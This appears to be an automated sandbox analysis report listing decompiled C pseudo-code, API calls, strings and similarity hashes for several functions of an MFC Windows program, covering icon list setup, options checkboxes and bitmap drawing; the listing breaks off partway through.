#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C17
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C1F
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C27
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C3B
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C52
#640.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C61
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C70
#640.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C7F

Strings

LB, xrefs: 004179BE
\B, xrefs: 00417ACE
LB, xrefs: 004179B7

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414$Create$#5785Color$#1641#5787#5873Compatible$#1640#2405#323#640BrushSolid$#2753#6172BitmapH_prolog
String ID: LB$LB$\B
API String ID: 4144306126-2660138642
Opcode ID: e028aa8c550cf5321776d7dadc7c3a410938a9dad3aeb4b5a035b41f2c367697
Instruction ID: 125ffb72028a29474156ab81f639c779b758b553aebaaae3ef33e9ce92ff0dd7
Opcode Fuzzy Hash: e028aa8c550cf5321776d7dadc7c3a410938a9dad3aeb4b5a035b41f2c367697
Instruction Fuzzy Hash: 28A1497290015DBECF01EFA1ED46EEEBFB9EF58304F10011AF901A2161DB389A95DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004013AC, Relevance: 69.2, APIs: 46, Instructions: 192
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E004013AC(void* __ecx, void* __eflags, intOrPtr _a4) {
				int _v4;
				int _v8;
				int _v12;
				void* _v16;
				void* _t25;
				char* _t30;
				long _t62;
				signed int _t65;
				int _t66;
				void* _t74;
				void* _t76;

				_t74 = __ecx;
				_t25 = L00401D4D(__ecx, _a4);
				_t66 = _t65 | 0xffffffff;
				if(_t25 == _t66) {
					L3:
					return _t66;
				} else {
					_push(0x4d2);
					_push(__ecx);
					 *(__ecx + 0x7c) =  *(__ecx + 0x7c) & 0x000000f0 | 0x00000020;
					_t30 =  &_v16;
					_push(_t30);
					_push(0x5000001f);
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					_v4 = 0;
					L00426108();
					if(_t30 != 0) {
						SendMessageA( *(__ecx + 0x134), 0x1036, 0, 0x20);
						_push(0);
						_push(0x200);
						_push(0);
						L00426102();
						_push(1);
						_push(1);
						_push(1);
						_push(0x10);
						_push(0x10);
						L00426000();
						L00425E44();
						_push(0x90);
						_t76 = 0xe;
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), _t66, LoadIconA(0x90, 0x90));
						L00425E44();
						_push(0x91);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x91, 0x91));
						L00425E44();
						_push(0x92);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x92, 0x92));
						L00425E44();
						_push(0x93);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x93, 0x93));
						L00425E44();
						_push(0x94);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x94, 0x94));
						L00425E44();
						_push(0x95);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x95, 0x95));
						L00425E44();
						_push(0x96);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x96, 0x96));
						L00425E44();
						_push(0x97);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x97, 0x97));
						L00425E44();
						_push(0x98);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x98, 0x98));
						L00425E44();
						_push(0x99);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x99, 0x99));
						_t62 = _t74 + 0x10c;
						if(_t62 != 0) {
							_t62 =  *(_t62 + 4);
						}
						_push(SendMessageA( *(_t74 + 0x134), 0x1003, 1, _t62));
						L00425FF4();
						return 0;
					}
					goto L3;
				}
			}

APIs

#2100.MFC42(5000001F,000004D2,?,000004D2,?), ref: 0040A917
SendMessageA.USER32 ref: 0040A935
#4287.MFC42(00000000,00000200,00000000,?,000004D2,?), ref: 0040A944
#2096.MFC42(00000010,00000010,00000001,00000001,00000001,00000000,00000200,00000000,?,000004D2,?), ref: 0040A959
#1168.MFC42(00000010,00000010,00000001,00000001,00000001,00000000,00000200,00000000,?,000004D2,?), ref: 0040A95E
#1146.MFC42(00000090,0000000E,00000090,00000010,00000010,00000001,00000001,00000001,00000000,00000200,00000000,?,000004D2,?), ref: 0040A96E
LoadIconA.USER32(00000000,00000090), ref: 0040A97A
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,000004D2,?), ref: 0040A98A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A98C
#1146.MFC42(00000091,0000000E,00000091,?,00000000,?,000004D2,?), ref: 0040A999
LoadIconA.USER32(00000000,00000091), ref: 0040A99F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040A9AA
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A9AC
#1146.MFC42(00000092,0000000E,00000092,?,00000000,?,000004D2,?), ref: 0040A9B9
LoadIconA.USER32(00000000,00000092), ref: 0040A9BF
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040A9CA
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A9CC
#1146.MFC42(00000093,0000000E,00000093,?,00000000,?,000004D2,?), ref: 0040A9D9
LoadIconA.USER32(00000000,00000093), ref: 0040A9DF
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040A9EA
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A9EC
#1146.MFC42(00000094,0000000E,00000094,?,00000000,?,000004D2,?), ref: 0040A9F9
LoadIconA.USER32(00000000,00000094), ref: 0040A9FF
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA0A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA0C
#1146.MFC42(00000095,0000000E,00000095,?,00000000,?,000004D2,?), ref: 0040AA19
LoadIconA.USER32(00000000,00000095), ref: 0040AA1F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA2A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA2C
#1146.MFC42(00000096,0000000E,00000096,?,00000000,?,000004D2,?), ref: 0040AA39
LoadIconA.USER32(00000000,00000096), ref: 0040AA3F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA4A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA4C
#1146.MFC42(00000097,0000000E,00000097,?,00000000,?,000004D2,?), ref: 0040AA59
LoadIconA.USER32(00000000,00000097), ref: 0040AA5F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA6A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA6C
#1146.MFC42(00000098,0000000E,00000098,?,00000000,?,000004D2,?), ref: 0040AA79
LoadIconA.USER32(00000000,00000098), ref: 0040AA7F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA8A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA8C
#1146.MFC42(00000099,0000000E,00000099,?,00000000,?,000004D2,?), ref: 0040AA99
LoadIconA.USER32(00000000,00000099), ref: 0040AA9F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AAAA
SendMessageA.USER32 ref: 0040AAC7
#2862.MFC42(00000000,?,00000000,?,000004D2,?), ref: 0040AACE

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$#1146#1168ImageList_LoadReplace$MessageSend$#2096#2100#2862#4287
String ID:
API String ID: 1681832846-0
Opcode ID: dabfb3e2b97fca12aee7397db4563f06a54b4f5f7c85e89b0ec5c60319f1c69b
Instruction ID: c4a1a47b0e797b94d93bdf1f6e6a0b17a49ead956252560e849e4b318cc2506b
Opcode Fuzzy Hash: dabfb3e2b97fca12aee7397db4563f06a54b4f5f7c85e89b0ec5c60319f1c69b
Instruction Fuzzy Hash: EC51B8B07047553AEA2077769C46FAB795CEF45324F420E1AB676E61E2CDBDDC008628

Uniqueness

Uniqueness Score: -1.00%

Function 004014DD, Relevance: 64.9, APIs: 23, Strings: 14, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004014DD(void* __eax, void* __ecx) {
				long _t19;
				long _t21;
				long _t23;
				long _t25;
				long _t27;
				long _t29;
				long _t31;
				void* _t45;

				_t45 = __ecx;
				L00426426();
				L00425E44();
				L00425E3E();
				_t19 = SendMessageA( *(__ecx + 0x80), 0xf1,  *(__eax + 4), 0);
				L00425E44();
				L00425E3E();
				_t21 = SendMessageA( *(_t45 + 0x180), 0xf1,  *(_t19 + 4), 0);
				L00425E44();
				L00425E3E();
				_t23 = SendMessageA( *(_t45 + 0x1c0), 0xf1,  *(_t21 + 4), 0);
				L00425E44();
				L00425E3E();
				_t25 = SendMessageA( *(_t45 + 0x200), 0xf1,  *(_t23 + 4), 0);
				L00425E44();
				L00425E3E();
				_t27 = SendMessageA( *(_t45 + 0xc0), 0xf1,  *(_t25 + 4), 0);
				L00425E44();
				L00425E3E();
				_t29 = SendMessageA( *(_t45 + 0x140), 0xf1,  *(_t27 + 4), 0);
				L00425E44();
				L00425E3E();
				_t31 = SendMessageA( *(_t45 + 0x100), 0xf1,  *(_t29 + 4), 0);
				__imp__CoInitialize(0, "Options", "NotifyPrivateMessage", 1, "Options", "NotifyRemove", 1, "Options", "NotifyAdd", 1, "Options", "ShortcutMenu", 1, "Options", "ShortcutDesktop", 1, "Options", "MinimizeToTray", 1, "Options", "ShowSplash", 0);
				return 0 | _t31 >= 0x00000000;
			}

APIs

#4710.MFC42 ref: 0040E903
#1168.MFC42 ref: 0040E908
#3521.MFC42(Options,ShowSplash,00000000), ref: 0040E91F
SendMessageA.USER32 ref: 0040E938
#1168.MFC42 ref: 0040E93A
#3521.MFC42(Options,MinimizeToTray,00000001), ref: 0040E950
SendMessageA.USER32 ref: 0040E95E
#1168.MFC42 ref: 0040E960
#3521.MFC42(Options,ShortcutDesktop,00000001), ref: 0040E976
SendMessageA.USER32 ref: 0040E984
#1168.MFC42 ref: 0040E986
#3521.MFC42(Options,ShortcutMenu,00000001), ref: 0040E99C
SendMessageA.USER32 ref: 0040E9AA
#1168.MFC42 ref: 0040E9AC
#3521.MFC42(Options,NotifyAdd,00000001), ref: 0040E9C2
SendMessageA.USER32 ref: 0040E9D0
#1168.MFC42 ref: 0040E9D2
#3521.MFC42(Options,NotifyRemove,00000001), ref: 0040E9E8
SendMessageA.USER32 ref: 0040E9F6
#1168.MFC42 ref: 0040E9F8
#3521.MFC42(Options,NotifyPrivateMessage,00000001), ref: 0040EA0E
SendMessageA.USER32 ref: 0040EA1C
CoInitialize.OLE32(00000000), ref: 0040EA1F

Strings

ShortcutDesktop, xrefs: 0040E96A
NotifyRemove, xrefs: 0040E9DC
Options, xrefs: 0040E9E1
Options, xrefs: 0040E918
Options, xrefs: 0040E995
NotifyAdd, xrefs: 0040E9B6
NotifyPrivateMessage, xrefs: 0040EA02
ShortcutMenu, xrefs: 0040E990
Options, xrefs: 0040E949
Options, xrefs: 0040EA07
Options, xrefs: 0040E96F
Options, xrefs: 0040E9BB
ShowSplash, xrefs: 0040E913
MinimizeToTray, xrefs: 0040E944

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#3521MessageSend$#4710Initialize
String ID: MinimizeToTray$NotifyAdd$NotifyPrivateMessage$NotifyRemove$Options$Options$Options$Options$Options$Options$Options$ShortcutDesktop$ShortcutMenu$ShowSplash
API String ID: 4202957865-2085320903
Opcode ID: 51367e9f719fa8b4abe38d72f8fe3f61c2591de8af83374cd91b4e3839c84acb
Instruction ID: d481293b63a27fefdfe2eaca82e192f5d2ca3140d30a90fc94559ecbbdfc94c8
Opcode Fuzzy Hash: 51367e9f719fa8b4abe38d72f8fe3f61c2591de8af83374cd91b4e3839c84acb
Instruction Fuzzy Hash: 8A216FB13507187FFA1073729C86F7B7A9DDF44748F52441AB249AB192C9BEAC10972C

Uniqueness

Uniqueness Score: -1.00%

Function 00401131, Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 226
windowCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00401131(intOrPtr* __ecx, void* __eflags) {
				signed int _t110;
				struct HBRUSH__* _t115;
				signed int _t125;
				intOrPtr _t126;
				signed int _t127;
				intOrPtr* _t134;
				void* _t180;
				void* _t182;
				void* _t183;

				L004269E6();
				_t183 = _t182 - 0x74;
				_t134 = __ecx;
				_push(__ecx);
				L0042654C();
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x20), _t180 - 0x4c);
				_push(_t180 - 0x4c);
				L00426546();
				GetWindowRect( *(_t134 + 0x20), _t180 - 0x2c);
				OffsetRect(_t180 - 0x4c,  ~( *(_t180 - 0x2c)),  ~( *(_t180 - 0x28)));
				OffsetRect(_t180 - 0x2c,  ~( *(_t180 - 0x2c)),  ~( *(_t180 - 0x28)));
				L004264B0();
				 *(_t180 - 4) = 1;
				asm("sbb eax, eax");
				_push(CreateCompatibleDC( ~(_t180 - 0x80) &  *(_t180 - 0x7c)));
				L004264AA();
				L00401974(_t180 - 0x1c);
				 *(_t180 - 0x1c) = 0x42e34c;
				 *(_t180 - 4) = 2;
				_push(CreateCompatibleBitmap( *(_t180 - 0x7c),  *((intOrPtr*)(_t180 - 0x24)) -  *(_t180 - 0x2c),  *((intOrPtr*)(_t180 - 0x20)) -  *(_t180 - 0x28)));
				L004264BC();
				_t29 = _t180 - 0x1c; // 0x42e34c
				asm("sbb eax, eax");
				_t110 =  ~_t29 &  *(_t180 - 0x18);
				_push(_t110);
				_push( *(_t180 - 0x38));
				L00426540();
				 *(_t180 - 0x14) = _t110;
				_push(_t180 - 0x4c);
				L0042653A();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t180 - 0x5c);
				_push(_t180 - 0x3c);
				asm("movsd");
				L00426534();
				_push(_t180 - 0x5c);
				L0042652E();
				_t115 = GetClassLongA( *(_t134 + 0x20), 0xfffffff6);
				_push(_t115);
				L00426528();
				if(_t115 != 0) {
					_t115 =  *(_t115 + 4);
				}
				FillRect( *(_t180 - 0x38), _t180 - 0x5c, _t115);
				if(( *(_t134 + 0x7c) & 0x00000010) != 0) {
					 *(_t180 - 0x10) =  *(_t180 - 0x10) & 0x00000000;
					do {
						_t127 =  *(_t180 - 0x10);
						if(_t127 != 0) {
							if(_t127 != 1) {
								if(_t127 != 2) {
									if(_t127 == 3) {
										_push(0xf);
										goto L13;
									}
								} else {
									_push(0xb);
									goto L13;
								}
							} else {
								_push(0xc);
								goto L13;
							}
						} else {
							_push(0xa);
							L13:
							_pop(0);
						}
						_push(_t180 - 0x6c);
						_push(0);
						_t183 = _t183 - 0x10;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(L004018AC(_t134) != 0) {
							_push(GetSysColor(0x10));
							_push(GetSysColor(0x14));
							_push(_t180 - 0x6c);
							L004264D4();
						}
						 *(_t180 - 0x10) =  *(_t180 - 0x10) + 1;
					} while ( *(_t180 - 0x10) < 4);
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_t134 + 0x108))(_t180 - 0x3c);
				asm("sbb eax, eax");
				BitBlt( *(_t180 - 0x7c), 0, 0,  *((intOrPtr*)(_t180 - 0x24)) -  *(_t180 - 0x2c),  *((intOrPtr*)(_t180 - 0x20)) -  *(_t180 - 0x28),  ~(_t180 - 0x3c) &  *(_t180 - 0x38), 0, 0, 0xcc0020);
				ReleaseDC( *(_t134 + 0x20),  *(_t180 - 0x7c));
				_t125 =  *(_t180 - 0x14);
				if(_t125 != 0) {
					_t126 =  *((intOrPtr*)(_t125 + 4));
				} else {
					_t126 = 0;
				}
				_push(_t126);
				_push( *(_t180 - 0x38));
				L00426540();
				L00425FA6();
				L004264A4();
				 *(_t180 - 0x1c) = 0x42c514;
				 *(_t180 - 4) = 3;
				L00425FA6();
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				 *(_t180 - 0x1c) = 0x42c4fc;
				L0042649E();
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				L00426522();
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return _t126;
			}

APIs

_EH_prolog.MSVCRT ref: 00410467
#562.MFC42 ref: 00410478
GetClientRect.USER32 ref: 00410488
#6605.MFC42(?), ref: 00410494
GetWindowRect.USER32 ref: 004104A0
OffsetRect.USER32(?,?,?), ref: 004104BC
OffsetRect.USER32(?,?,?), ref: 004104CE
#323.MFC42 ref: 004104D3
CreateCompatibleDC.GDI32(?), ref: 004104E7
#1640.MFC42(00000000), ref: 004104F1
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041051A
#1641.MFC42(00000000), ref: 00410524
#5785.MFC42(?,?,00000000), ref: 00410537
#2714.MFC42(?,?,?,00000000), ref: 00410546
#2569.MFC42(?,?,?,?,?,00000000), ref: 0041055F
#4023.MFC42(?,?,?,?,?,?,00000000), ref: 0041056B
GetClassLongA.USER32 ref: 00410575
#2860.MFC42(00000000), ref: 0041057C
FillRect.USER32 ref: 00410590
GetSysColor.USER32(00000010), ref: 004105ED
GetSysColor.USER32(00000014), ref: 004105F2
#2567.MFC42(?,00000000), ref: 004105FC
BitBlt.GDI32(00000010,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041064B
ReleaseDC.USER32 ref: 00410657
#5785.MFC42(?,00000002), ref: 0041066F
#2414.MFC42(?,00000002), ref: 00410677
#2405.MFC42(?,00000002), ref: 0041067F
#2414.MFC42(?,00000002), ref: 00410692
#640.MFC42(?,00000002), ref: 004106A5
#816.MFC42(?,00000002), ref: 004106B1

Strings

LB, xrefs: 00410521

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$#2414#5785ColorCompatibleCreateOffset$#1640#1641#2405#2567#2569#2714#2860#323#4023#562#640#6605#816BitmapClassClientFillH_prologLongReleaseWindow
String ID: LB
API String ID: 751218347-3532020319
Opcode ID: 3a4924bab948575f748fc938b6d5a42bb8aeacbd725bbef5f88ae253afb509cd
Instruction ID: 73104f1fd9a088f6667cb8f94c01c143af1009ea9b550939ea17e34a2430798c
Opcode Fuzzy Hash: 3a4924bab948575f748fc938b6d5a42bb8aeacbd725bbef5f88ae253afb509cd
Instruction Fuzzy Hash: E8813B72D00119AFDF14EFE4EC85AEEBBB9EF09304F50812AF811A7191DB786945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004170D4, Relevance: 50.9, APIs: 27, Strings: 2, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004170D4() {
				int _t82;
				intOrPtr _t83;
				signed int _t92;
				intOrPtr _t101;
				intOrPtr _t102;
				void* _t106;
				void* _t110;
				signed int _t126;
				intOrPtr _t127;
				int _t130;
				void* _t136;
				void* _t138;
				long long* _t139;

				L004269E6();
				_t139 = _t138 - 0x64;
				_t110 = _t136 - 0x38;
				L004264B0();
				 *(_t136 - 4) = 0;
				 *(_t136 - 0x10) = GetSysColor(0x10);
				if( *0x4421ac != 7) {
					L2:
					_push(_t110);
					 *_t139 =  *0x42e728;
					 *(_t136 - 0x10) = L0040226B(_t143,  *(_t136 - 0x10), _t110);
				} else {
					_t106 = L00401F23();
					_t143 = _t106;
					if(_t106 != 0) {
						goto L2;
					}
				}
				GetObjectA( *( *(_t136 + 8) + 4), 0x18, _t136 - 0x70);
				_push(CreateCompatibleDC(0));
				L004264AA();
				_t82 =  *(_t136 + 8);
				if(_t82 != 0) {
					_t83 =  *((intOrPtr*)(_t82 + 4));
				} else {
					_t83 = 0;
				}
				_push(_t83);
				_push( *(_t136 - 0x34));
				L00426540();
				 *((intOrPtr*)(_t136 - 0x18)) = _t83;
				L004264B0();
				L00401974(_t136 - 0x20);
				 *(_t136 - 0x20) = 0x42e55c;
				L00401974(_t136 - 0x28);
				 *(_t136 - 0x28) = 0x42e34c;
				 *(_t136 - 4) = 3;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_push(CreateCompatibleBitmap( *(_t136 - 0x34),  *(_t136 - 0x6c),  *(_t136 - 0x68)));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0xf)));
				L004264BC();
				_t26 = _t136 - 0x28; // 0x42e34c
				asm("sbb eax, eax");
				_t92 =  ~_t26 &  *(_t136 - 0x24);
				_push(_t92);
				_push( *(_t136 - 0x44));
				L00426540();
				_t126 = _t92;
				 *(_t136 - 0x50) =  *(_t136 - 0x6c);
				 *(_t136 - 0x4c) =  *(_t136 - 0x68);
				_t33 = _t136 - 0x20; // 0x42e55c
				asm("sbb eax, eax");
				 *(_t136 - 0x58) = 0;
				 *((intOrPtr*)(_t136 - 0x54)) = 0;
				FillRect( *(_t136 - 0x44), _t136 - 0x58,  ~_t33 &  *(_t136 - 0x1c));
				 *((intOrPtr*)(_t136 - 0x14)) = GetPixel( *(_t136 - 0x44), 1, 1);
				L00425FA6();
				if(_t126 != 0) {
					_t127 =  *((intOrPtr*)(_t126 + 4));
				} else {
					_t127 = 0;
				}
				_push(_t127);
				_push( *(_t136 - 0x44));
				L00426540();
				 *(_t136 + 8) = 0;
				if( *(_t136 - 0x6c) > 0) {
					do {
						_t130 = 0;
						if( *(_t136 - 0x68) > 0) {
							do {
								if(GetPixel( *(_t136 - 0x34),  *(_t136 + 8), _t130) !=  *((intOrPtr*)(_t136 - 0x14))) {
									SetPixel( *(_t136 - 0x34),  *(_t136 + 8), _t130,  *(_t136 - 0x10));
								}
								_t130 = _t130 + 1;
							} while (_t130 <  *(_t136 - 0x68));
						}
						 *(_t136 + 8) =  *(_t136 + 8) + 1;
					} while ( *(_t136 + 8) <  *(_t136 - 0x6c));
				}
				_t101 =  *((intOrPtr*)(_t136 - 0x18));
				if(_t101 != 0) {
					_t102 =  *((intOrPtr*)(_t101 + 4));
				} else {
					_t102 = 0;
				}
				_push(_t102);
				_push( *(_t136 - 0x34));
				L00426540();
				 *(_t136 - 0x28) = 0x42c514;
				 *(_t136 - 4) = 4;
				L00425FA6();
				 *(_t136 - 0x20) = 0x42c514;
				 *(_t136 - 0x28) = 0x42c4fc;
				 *(_t136 - 4) = 5;
				L00425FA6();
				 *(_t136 - 0x20) = 0x42c4fc;
				 *(_t136 - 4) = 0;
				L0042649E();
				 *(_t136 - 4) =  *(_t136 - 4) | 0xffffffff;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t136 - 0xc));
				return _t102;
			}

APIs

_EH_prolog.MSVCRT ref: 004170D9
#323.MFC42 ref: 004170E7
GetSysColor.USER32(00000010), ref: 004170F9
GetObjectA.GDI32(?,00000018,?), ref: 00417135
CreateCompatibleDC.GDI32(00000000), ref: 00417142
#1640.MFC42(00000000), ref: 00417148
#5785.MFC42(?,?,00000000), ref: 0041715F
#323.MFC42(?,?,00000000), ref: 0041716A
CreateCompatibleDC.GDI32(00000000), ref: 00417192
#1640.MFC42(00000000), ref: 00417198
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004171A6
#1641.MFC42(00000000), ref: 004171B0
GetSysColor.USER32(0000000F), ref: 004171B7
CreateSolidBrush.GDI32(00000000), ref: 004171BA
#1641.MFC42(00000000), ref: 004171C4
#5785.MFC42(?,?,00000000), ref: 004171D7
FillRect.USER32 ref: 00417202
GetPixel.GDI32(?,00000001,00000001), ref: 00417215
#2414.MFC42 ref: 0041721D
#5785.MFC42(?,?), ref: 00417231
GetPixel.GDI32(?,?,00000000), ref: 0041724C
SetPixel.GDI32(?,?,00000000,?), ref: 0041725D
#5785.MFC42(?,00000003,?,?), ref: 00417286
#2414.MFC42(?,00000003,?,?), ref: 0041729A
#2414.MFC42(?,00000003,?,?), ref: 004172B1
#640.MFC42(?,00000003,?,?), ref: 004172BF
#640.MFC42(?,00000003,?,?), ref: 004172CB

Strings

LB, xrefs: 004171AD
\B, xrefs: 004171C1

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
